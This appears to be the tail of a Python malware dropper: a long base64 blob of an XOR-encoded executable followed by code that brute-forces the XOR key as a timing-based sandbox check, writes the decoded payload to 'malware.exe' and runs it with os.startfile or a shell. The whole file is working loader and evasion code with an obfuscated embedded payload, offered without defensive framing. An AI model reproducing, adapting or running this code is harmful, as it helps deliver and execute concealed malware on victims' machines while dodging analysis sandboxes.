LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWkZaRlpGW
kZYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8olpGWkZaRlpGW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWkZaRlpGWkZYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8olpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGW
kZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8olpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaR
lpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGWkZaRlpGW
kZaRlpGWkZYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
KC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYo
LyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligv
KJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8o
ligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiWKC8oligvKJYoLyiW
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlvaWppfnluaW9pTmkG
bW5pb2luaW5pb2lOaXZrbmlsaU5JbmlvaU5pxnluaW1pXlluaW9pTmnGTG5pamluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5JbmlOaW5pbslmyQbJ7snmyf7JBssey+7L9svOy25pblluaWJpbmlmyW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5p
bmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmluaW5pbmlu
aW5p
'''

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XORs the given data with the key (repeating key if necessary)."""
    return bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))


def process_file(input_path: str, output_path: str, key: bytes) -> None:
    """Reads `input_path`, XORs its contents with `key`, and writes to `output_path`."""
    if not os.path.isfile(input_path):
        raise FileNotFoundError(f"File not found: {input_path}")

    with open(input_path, 'rb') as f:
        data = f.read()

    result = xor_bytes(data, key)

    with open(output_path, 'wb') as f:
        f.write(result)


def process_embedded_exe(output_path: str, key: bytes) -> None:
    """XORs and writes the embedded EXE to disk."""
    # Decode embedded binary
    data = base64.b64decode(embedded_exe_b64)

    # XOR it
    result = xor_bytes(data, key)

    # Write to disk
    with open(output_path, 'wb') as f:
        f.write(result)


def run_file(path: str) -> None:
    """Attempts to execute the file at `path`."""
    try:
        if sys.platform == 'win32':
            os.startfile(path)
        else:
            subprocess.Popen([path], shell=True)
    except Exception as e:
        print(f"Error running file '{path}': {e}")


def brute_force_xor(file_path, max_key_len=4):
    """
    Brute-force XOR key search on a file.
    Tries all keys up to max_key_len and checks for known headers.
    """
    with open(file_path, "rb") as f:
        data = f.read(1024)  

    for key_len in range(1, max_key_len + 1):
        print(f"[*] Trying key length {key_len} ...")
        for key_tuple in itertools.product(range(256), repeat=key_len):
            key = bytes(key_tuple)
            decrypted = xor_bytes(data, key)

            if b"This program cannot" in decrypted:
                print(f"[+] Found key: {key!r}")
                return key

    print("[-] No valid key found.")
    return None   


def sandbox_check(enc_file) -> bytes:
    start = time.time()
    key = brute_force_xor(enc_file)
    end = time.time()
    print(f"Elapsted time: {end - start:.2f} seconds")
    return key


def main():
    parser = argparse.ArgumentParser(description="XOR a file with a key and optionally run the result.")
    parser.add_argument('-f', '--file', dest='file', default='input.bin',
                        help='Path to input file (default: input.bin)')
    parser.add_argument('-k', '--key', dest='key', default='ni',
                        help='Encryption/decryption key (string) (default: secret)')
    parser.add_argument('-n', '--no-run', action='store_true', dest='no_run',
                        help="Skip running the processed file after XOR")
    args = parser.parse_args()

    # Convert key directly to bytes
    key_bytes = args.key.encode('utf-8')
    input_path = args.file

    # if the user inserted -n, just xor the binary
    if (args.no_run):
        # XOR process
        process_file(input_path, "./innocent.bin", key_bytes)
        print(f"Processed file saved to: innocent.bin")
        return

    key = sandbox_check("innocent.bin")

    # the user didn't use -n == check for sandbox, decrypt and run
    if (key == None):
        print("THIS IS A SANDBOX!")
        return

    # XOR process
    process_embedded_exe("./malware.exe", key)
    print(f"Processed file saved to: ./malware.exe")

    print(f"Running processed file: malware.exe")
    run_file(".\\malware.exe")
    return

if __name__ == '__main__':
    main()
    print("Done!")
